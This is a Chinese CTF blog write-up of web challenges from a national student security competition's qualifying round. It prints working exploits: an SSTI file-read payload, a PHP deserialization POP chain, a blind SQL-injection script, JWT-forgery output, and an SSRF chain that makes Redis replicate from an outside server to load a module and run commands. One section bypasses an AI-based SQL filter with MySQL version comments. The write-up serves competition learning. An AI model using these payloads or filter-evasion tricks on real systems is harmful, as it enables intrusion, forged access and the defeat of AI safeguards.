mobile wallpaper 1mobile wallpaper 2mobile wallpaper 3mobile wallpaper 4mobile wallpaper 5mobile wallpaper 6
Profile Image of the Author
炒米线
GitHub
公告
我 Chao! 我好困啊!
标签
392 字
1 分钟
第十九届全国大学生信息安全竞赛(创新实践能力赛)暨第三届“长城杯”网数智安全大赛(防护赛)初赛
2025-12-28
CTF
CTF
/
CCB
/
CISCN

[Web]EzJava#

弱密码登陆: admin/admin123

Spring框架Thymeleaf SSTI Pyaload

[[${7*7}]]
49


[[${#ctx}]]
{ip=10.0.0.248, now=2025-12-28T09:58:19.162353, ua=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36, thymeleaf::EvaluationContext=org.thymeleaf.spring5.expression.ThymeleafEvaluationContextWrapper@765801c6}[StandardHTMLInliner]([[${#ctx}]])

EzJava

[[${#ctx.getClass().forName("java.nio.file.Files").getMethod("readString", #ctx.getClass().forName("java.nio.file.Path")).invoke(null, #ctx.getClass().forName("java.nio.file.Paths").getMethod("get", #ctx.getClass().forName("java.lang.String"), #ctx.getClass().forName("[Ljava.lang.String;")).invoke(null, "/fl" + "ag_y0u_d0nt_kn0w", #strings.arraySplit("", ",")))}]]

[Web]dedecms#

先注册一个账号,发现有一个Aa123456789用户,尝试登陆,发现弱密码:Aa123456789/Aa123456789 upload

dedecms

简单搜索,发现dedecms v5.1 sp2存在相当多漏洞,多数是文件上传,拦截改后缀。随便找上传点,写一个图片马,拦截后缀改php。

[Web]redjs#

前几天爆出的React.js漏洞。使用 React2Shell 一把梭。

[Web]hellogate#

访问靶机看到一张图片,下载下来发现是图片马。

<?php
error_reporting(0);
class A {
    public $handle;
    public function triggerMethod() {
        echo "" . $this->handle;
    }
}
class B {
    public $worker;
    public $cmd;
    public function __toString() {
        return $this->worker->result;
    }
}
class C {
    public $cmd;
    public function __get($name) {
        echo file_get_contents($this->cmd);
    }
}
$raw = isset($_POST['data']) ? $_POST['data'] : '';
header('Content-Type: image/jpeg');
readfile("muzujijiji.jpg");
highlight_file(__FILE__);
$obj = unserialize($_POST['data']);
$obj->triggerMethod();

pop链,写个exp:

<?php
class A {
    public $handle;
}
class B {
    public $worker;
}
class C {
    public $cmd;
}


$a = new A();
$b = new B();
$c = new C();


$c->cmd = '/flag';
$b->worker = $c;
$a->handle = $b;


echo urlencode(serialize($a));
?>

去POST data拿到flag。

[Web]AI_WAF#

带有AI审核的Sql注入。简单摸索,发现-1'||substr(database(),1,1)='a'#可以盲注,写exp:

from time import sleep
import requests
import string


url = "http://60.205.252.190:34938/search"
headers = {"Content-Type": "application/json"}


# chars = string.digits + string.ascii_letters + "_"
chars = string.ascii_letters + "_"
result = ""
for i in range(1, 20):
    for char in chars:
        # Payload: -1'||substr(database(),1,1)='a'#
        payload = f"-1'||substr(database(),{i},1)='{char}'#"
        data = {"query": payload}


        try:
            sleep(1)
            r = requests.post(url, json=data, headers=headers, timeout=3)
            res = r.json()
            print(res)
            count = res.get("count", 0)


            if count != 0:
                result += char
                print(result)
                break
        except Exception as e:
            print("fuck")


print(result)
# nexadata

blind_injection 然后那库名继续盲注,缺发现过不了AI WAF了,考虑其他方法。把database()改成version()盲注,发现是mysql5.

/*!50000 */ 是mysql中的一种特殊版本内联注释,只有当mysql版本满足指定数字(这里的50000代表5.0.0)时,这部分内容才会被当作sql命令执行。这个注释很不常见,可以用来绕过AI Waf。

构造以下payload:

-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ group_concat(table_name) /*!50000from*/ /*!50000information_schema.tables*/ /*!50000where*/ table_schema='nexadata'),3;#

1 获得article,where_is_my_flagggggg

-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ * from nexadata.where_is_my_flagggggg),3;#

2 拿到flag

[Web]Deprecated#

参考AsaL1n的wp,发现是原题。

public

git clone https://github.com/sammwyy/r2sae
cd r2sae


docker run -it sig2n /bin/bash


root@7f5f15b8bf09:/app# python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjI0fQ.200-7l5FAFAPmXWjvcpPbmxUPHdowPrwdswwuWQAo68D882fCdlAiG54vWx2l3I-iM2mXOVDFxlVnw5A4gzxqxwhtu5RIITQwApDBxGu_3MHdQ10_nvvO8tDv7fFSrC2_kM4VOVEtjabQBgn1OGQfNjAQEeM8m1nxX5qXsyBUEI eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjY0fQ.nnk29Tek8TIcRFEjHmDnC60_cSToSAXPbbD-v3jZJu_bbwG7tBPCHohbz3fvZt4yUmH5vXLDyawJDyaKzfiQFI7LNhr12TInDmiDJRIBNAjKBSDAiXZS37I_lss8ftrJq8olOhkzlCRia5EQUqpp_s08jQe75FKifXM_zuugLE4 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjgwfQ.aPy4NdsNwghpXlB0PoLohDaM4kgDilHmsnkPl691_dNvwuPyXmpJ4Qzd68wH0zq9oavXckgCim4AiM8p-jtNJA8jwBidR85DePOye73XISAHFb8xC24e0dfvK4pytbmAyfjys8fAPYigU4ATH6ZEY5zOEXSpkWZdM3XFFoR-7XY
[*] GCD:  0x1
[*] GCD:  0xe5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c3717377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358feaa93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b
[+] Found n with multiplier 1  :
 0xe5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c3717377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358feaa93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b
[+] Written to e5f772ebb5363556_65537_x509.pem
[+] Tampered JWT: b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk'
[+] Written to e5f772ebb5363556_65537_pkcs1.pem
[+] Tampered JWT: b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.dpXSrmSVXe_4JyAGUm0QvHrWDe3JfKh7uxg6A1p8C18'
================================================================================
Here are your JWT's once again for your copypasting pleasure
================================================================================
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.dpXSrmSVXe_4JyAGUm0QvHrWDe3JfKh7uxg6A1p8C18

拿到公钥后按照wp复现一遍。

[未解出][Web]0o0o0o0o0#

http://123.56.93.38:28707/data?id=1'union select 1,2,3 and '1'='1

1和2是可控的 0o0o0o0o0 没什么进展了。

[赛后复现][Web]hjppx#

SSRF,简单探测发现内网存在redis、mysql以及8080端口的pb-cms。

fetch一下redis,dict://127.0.0.1:6379/info,发现没有密码。使用redis-rogue-server,依照README,依次请求:

#设置备份文件名
action=fetch&url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so


#连接恶意Redis服务器
action=fetch&url=dict://127.0.0.1:6379/slaveof:120.26.146.96:21000


#加载恶意模块
action=fetch&url=dict://127.0.0.1:6379/module:load:./exp.so


#切断主从复制
action=fetch&url=dict://127.0.0.1:6379/slaveof:no:one


#执行系统命令
action=fetch&url=dict://127.0.0.1:6379/system.exec:"ls /"

rce

分享

如果这篇文章对你有帮助,欢迎分享给更多人!

第十九届全国大学生信息安全竞赛(创新实践能力赛)暨第三届“长城杯”网数智安全大赛(防护赛)初赛
https://blog.chaomixian.top/posts/2025-ccb-ciscn-quals/
作者
炒米线
发布于
2025-12-28
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时

Java题你得会啊
0CTF-2025
相关文章 智能推荐
1
第三届长城杯半决赛(浙江)
CTF 2026-03-22
2
2026-软件系统安全赛-华东赛区
CTF 2026-03-14
3
第八届浙江省大学生网络与信息安全竞赛决赛
CTF 2025-11-16
4
第八届浙江省大学生网络与信息安全竞赛预赛
CTF 2025-11-08
5
Dreamhack 刷题日记喵
CTF 2026-03-04
随机文章 随机推荐
1
Java题你得会啊
CTF 2026-01-13
2
ISCTF-2025
CTF 2025-12-10
3
PHP是世界上最好的语言--Trick锦集
CTF 2025-12-10
4
Dreamhack 刷题日记喵
CTF 2026-03-04
5
老Mac折腾笔记
折腾 2025-11-23
浙ICP备2026006038号
© 2026 炒米线. All Rights Reserved. / RSS / Atom / Sitemap
Powered by Astro & Mizuki  Version 9.0

目录